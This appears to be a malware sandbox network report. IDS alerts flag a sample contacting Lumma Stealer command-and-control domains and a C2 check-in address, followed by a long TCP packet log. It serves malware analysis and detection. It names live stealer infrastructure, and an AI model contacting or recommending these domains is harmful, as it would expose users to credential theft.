                                                                                                                                      2024-10-07T03:24:07.045887+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.4509841.1.1.153UDP
                                                                                                                                      2024-10-07T03:24:07.057096+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.4493521.1.1.153UDP
                                                                                                                                      2024-10-07T03:24:07.080294+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.4636951.1.1.153UDP
                                                                                                                                      2024-10-07T03:24:07.091065+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.4634681.1.1.153UDP
                                                                                                                                      2024-10-07T03:24:09.272966+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.461190104.21.53.8443TCP
                                                                                                                                      2024-10-07T03:24:09.272966+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.461190104.21.53.8443TCP
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Oct 7, 2024 03:22:05.345036983 CEST49675443192.168.2.4173.222.162.32
                                                                                                                                      Oct 7, 2024 03:22:18.177383900 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:18.177474022 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:18.178663969 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:18.179912090 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:18.179990053 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:18.862241030 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:18.862487078 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:18.869441032 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:18.869494915 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:18.869812012 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:18.923168898 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:19.678400993 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:19.686403990 CEST4972380192.168.2.4199.232.210.172
                                                                                                                                      Oct 7, 2024 03:22:19.692049026 CEST8049723199.232.210.172192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.692123890 CEST4972380192.168.2.4199.232.210.172
                                                                                                                                      Oct 7, 2024 03:22:19.719455957 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899111032 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899152994 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899163008 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899295092 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:19.899303913 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899355888 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899408102 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899446964 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:19.899446964 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:19.899462938 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899486065 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:19.899491072 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899517059 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:19.899525881 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899544954 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:19.899571896 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:19.899579048 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899631023 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:19.899672031 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:20.546498060 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:20.546499014 CEST49730443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:20.546566963 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:20.546622038 CEST4434973020.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:56.370143890 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:56.370213985 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:56.370307922 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:56.370657921 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:56.370676994 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:56.980529070 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:56.980614901 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:56.980709076 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:56.981102943 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:56.981137991 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.033171892 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.033246040 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.038629055 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.038640976 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.039062977 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.050781012 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.095401049 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.150878906 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.150940895 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.150983095 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.151098013 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.151117086 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.151170969 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.237464905 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.237524986 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.239330053 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.239381075 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.239381075 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.239459038 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.239489079 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.239509106 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.239511013 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.239538908 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.239573002 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.239593983 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.325771093 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.325807095 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.325925112 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.325957060 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.326018095 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.326133013 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.326154947 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.326194048 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.326205969 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.326229095 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.326244116 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.326977968 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.326996088 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.327033043 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.327042103 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.327075005 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.328654051 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.328660965 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.328677893 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.328700066 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.328737974 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.328746080 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.328763962 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.328789949 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.414808035 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.414828062 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.414931059 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.414962053 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.415009022 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.415353060 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.415374041 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.415400982 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.415410995 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.415443897 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.415458918 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.416013002 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.416033983 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.416065931 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.416073084 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.416105986 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.416440964 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.416464090 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.416470051 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.416477919 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.416505098 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.416529894 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.416897058 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.416919947 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.416950941 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.416959047 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.416984081 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.417011023 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.417594910 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.417625904 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.417655945 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.417661905 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.417685986 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.417687893 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.417717934 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.417725086 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.417740107 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.417781115 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.417824030 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.451761961 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.455698967 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.455698967 CEST49736443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.455733061 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.455750942 CEST4434973613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.652827978 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.652868032 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.652930975 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.654556036 CEST49739443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.654612064 CEST4434973913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.654681921 CEST49739443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.654949903 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.655041933 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.655128002 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.655319929 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.655323029 CEST49741443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.655363083 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.655431986 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.655435085 CEST49741443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.656455040 CEST49742443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.656465054 CEST4434974213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.656518936 CEST49742443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.656699896 CEST49742443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.656713009 CEST4434974213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.656788111 CEST49741443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.656800032 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.656932116 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.656945944 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.656948090 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.657012939 CEST49739443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:57.657028913 CEST4434973913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.657028913 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.660721064 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.660748005 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.661178112 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.677822113 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.719430923 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.907494068 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.907553911 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.907597065 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.907622099 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.907644987 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.907659054 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.907681942 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.908217907 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.908261061 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.908286095 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.908294916 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.908315897 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.908504009 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.908550024 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.913877964 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.913902044 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:57.913914919 CEST49737443192.168.2.420.109.210.53
                                                                                                                                      Oct 7, 2024 03:22:57.913923025 CEST4434973720.109.210.53192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.292785883 CEST4434974213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.293271065 CEST49742443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.293283939 CEST4434974213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.293699980 CEST49742443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.293705940 CEST4434974213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.297231913 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.297570944 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.297591925 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.298247099 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.298253059 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.302364111 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.302684069 CEST49741443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.302707911 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.303181887 CEST49741443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.303195000 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.315500021 CEST4434973913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.315793037 CEST49739443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.315820932 CEST4434973913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.316328049 CEST49739443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.316337109 CEST4434973913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.326931953 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.327218056 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.327295065 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.327585936 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.327604055 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.391675949 CEST4434974213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.391742945 CEST4434974213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.391845942 CEST49742443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.392144918 CEST49742443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.392144918 CEST49742443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.392162085 CEST4434974213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.392172098 CEST4434974213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.395031929 CEST49743443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.395092010 CEST4434974313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.395174026 CEST49743443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.395250082 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.395272970 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.395323038 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.395344019 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.395363092 CEST49743443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.395381927 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.395405054 CEST4434974313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.395518064 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.395526886 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.395545006 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.395689964 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.395725965 CEST4434973813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.395762920 CEST49738443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.397721052 CEST49744443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.397809982 CEST4434974413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.397892952 CEST49744443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.398016930 CEST49744443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.398053885 CEST4434974413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.400994062 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.401047945 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.401122093 CEST49741443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.401130915 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.401175976 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.401246071 CEST49741443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.401246071 CEST49741443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.401278019 CEST49741443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.401283026 CEST4434974113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.403423071 CEST49745443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.403490067 CEST4434974513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.403572083 CEST49745443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.403693914 CEST49745443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.403731108 CEST4434974513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.415699959 CEST4434973913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.415836096 CEST4434973913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.415894032 CEST49739443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.416069031 CEST49739443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.416069031 CEST49739443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.416089058 CEST4434973913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.416100979 CEST4434973913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.418076992 CEST49746443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.418101072 CEST4434974613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.418184996 CEST49746443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.418304920 CEST49746443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.418330908 CEST4434974613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.429517031 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.429569006 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.429629087 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.429650068 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.429712057 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.429718971 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.429775000 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.429809093 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.429835081 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.429857969 CEST49740443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.429871082 CEST4434974013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.431921959 CEST49747443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.431950092 CEST4434974713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:58.432027102 CEST49747443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.432158947 CEST49747443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:58.432185888 CEST4434974713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:59.040546894 CEST4434974313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:22:59.041126013 CEST49743443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:22:59.041172028 CEST4434974313.107.246.45192.168.2.4
